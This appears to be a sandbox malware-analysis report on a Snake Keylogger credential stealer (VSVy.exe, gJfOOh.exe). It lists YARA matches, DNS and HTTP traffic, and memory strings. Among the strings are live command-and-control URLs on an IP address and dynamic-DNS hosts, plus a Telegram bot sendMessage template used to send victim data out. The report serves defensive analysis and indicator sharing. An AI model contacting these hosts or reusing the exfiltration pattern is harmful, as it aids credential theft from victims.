Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.gemssystems.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 02:37:02 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 02:37:21 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.000000000307F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3899379679.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3899379184.0000000000425000.00000040.00000400.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3899379184.0000000000425000.00000040.00000400.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3899379679.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002E73000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3902406589.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.000000000308F000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.000000000307F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.gemssystems.com
Source: VSVy.exe, 00000000.00000002.2243490956.0000000002B97000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 0000000B.00000002.2433322042.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3899379184.0000000000425000.00000040.00000400.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3912014380.0000000003F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3902406589.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3899379184.0000000000436000.00000040.00000400.00020000.00000000.sdmp, gJfOOh.exe, 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20a
Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3912014380.0000000003F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3912014380.0000000003F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3912014380.0000000003F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: gJfOOh.exe, 00000010.00000002.3903689735.0000000003105000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003105000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002E87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enH
Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003100000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002D3F000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002FAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3902406589.0000000002D3F000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002FAE000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3899379679.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: gJfOOh.exe, 00000010.00000002.3903689735.0000000002FAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3902406589.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003023000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3912014380.0000000003F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: gJfOOh.exe, 00000010.00000002.3903689735.0000000003136000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003136000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/H
Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49908 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000A.00000002.3899379184.0000000000425000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: VSVy.exe PID: 764, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: VSVy.exe PID: 6208, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: gJfOOh.exe PID: 4160, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F460F8 NtQueryInformationProcess,	0_2_00F460F8
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F45D3C NtQueryInformationProcess,	0_2_00F45D3C
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04E36230 NtQueryInformationProcess,	11_2_04E36230
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04E3622A NtQueryInformationProcess,	11_2_04E3622A

Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F42200	0_2_00F42200
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F46308	0_2_00F46308
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F420A5	0_2_00F420A5
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F421F0	0_2_00F421F0
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F43510	0_2_00F43510
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F46513	0_2_00F46513
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F458FB	0_2_00F458FB
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F419BC	0_2_00F419BC
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F41947	0_2_00F41947
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F41912	0_2_00F41912
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F45908	0_2_00F45908
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F42A98	0_2_00F42A98
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F42A88	0_2_00F42A88
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F41BC8	0_2_00F41BC8
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F41B22	0_2_00F41B22
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F41CB6	0_2_00F41CB6
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F41EDA	0_2_00F41EDA
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_00F41F26	0_2_00F41F26
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_028D6B58	0_2_028D6B58
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_028D5E70	0_2_028D5E70
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_028DA3D0	0_2_028DA3D0
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_028DA3E0	0_2_028DA3E0
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_028DA0E0	0_2_028DA0E0
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_028DA0F0	0_2_028DA0F0
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_028D906A	0_2_028D906A
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_028D5889	0_2_028D5889
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_028D5894	0_2_028D5894
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_095788A8	0_2_095788A8
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_09570EB1	0_2_09570EB1
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_0957A901	0_2_0957A901
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_09570850	0_2_09570850
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_09570842	0_2_09570842
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_09779350	0_2_09779350
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_097729F8	0_2_097729F8
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_097711B8	0_2_097711B8
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_097715F0	0_2_097715F0
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_09770D80	0_2_09770D80
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_09772E30	0_2_09772E30
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_09772E20	0_2_09772E20
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012C7118	10_2_012C7118
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012CC146	10_2_012CC146
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012CA088	10_2_012CA088
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012C5370	10_2_012C5370
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012CD278	10_2_012CD278
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012CC468	10_2_012CC468
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012CC738	10_2_012CC738
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012C69A0	10_2_012C69A0
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012CE988	10_2_012CE988
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012CCA08	10_2_012CCA08
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012CCCD8	10_2_012CCCD8
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012CCFAA	10_2_012CCFAA
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012C3E09	10_2_012C3E09
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012CF961	10_2_012CF961
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012CE97A	10_2_012CE97A
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012C29EC	10_2_012C29EC
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_012C3AB1	10_2_012C3AB1
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_068EB978	10_2_068EB978
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_068E4E1F	10_2_068E4E1F
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_068E4E20	10_2_068E4E20
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_068E1B4C	10_2_068E1B4C
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_049D6CA1	11_2_049D6CA1
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_049D5A86	11_2_049D5A86
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_049D5598	11_2_049D5598
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_049D55A1	11_2_049D55A1
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_049D55D4	11_2_049D55D4
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_049D55C8	11_2_049D55C8
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_049DA290	11_2_049DA290
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_049DA2A0	11_2_049DA2A0
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_049D9330	11_2_049D9330
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_049D9FB8	11_2_049D9FB8
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_049D9FB6	11_2_049D9FB6
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04E38038	11_2_04E38038
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04E32200	11_2_04E32200
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04E334D1	11_2_04E334D1
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04E33510	11_2_04E33510
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04E38029	11_2_04E38029
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04E331F9	11_2_04E331F9
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04E3211D	11_2_04E3211D
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04E31287	11_2_04E31287
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04E38243	11_2_04E38243
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04E31912	11_2_04E31912
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04E32A88	11_2_04E32A88
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04E32A98	11_2_04E32A98
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04FE8718	11_2_04FE8718
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04FE2FC8	11_2_04FE2FC8
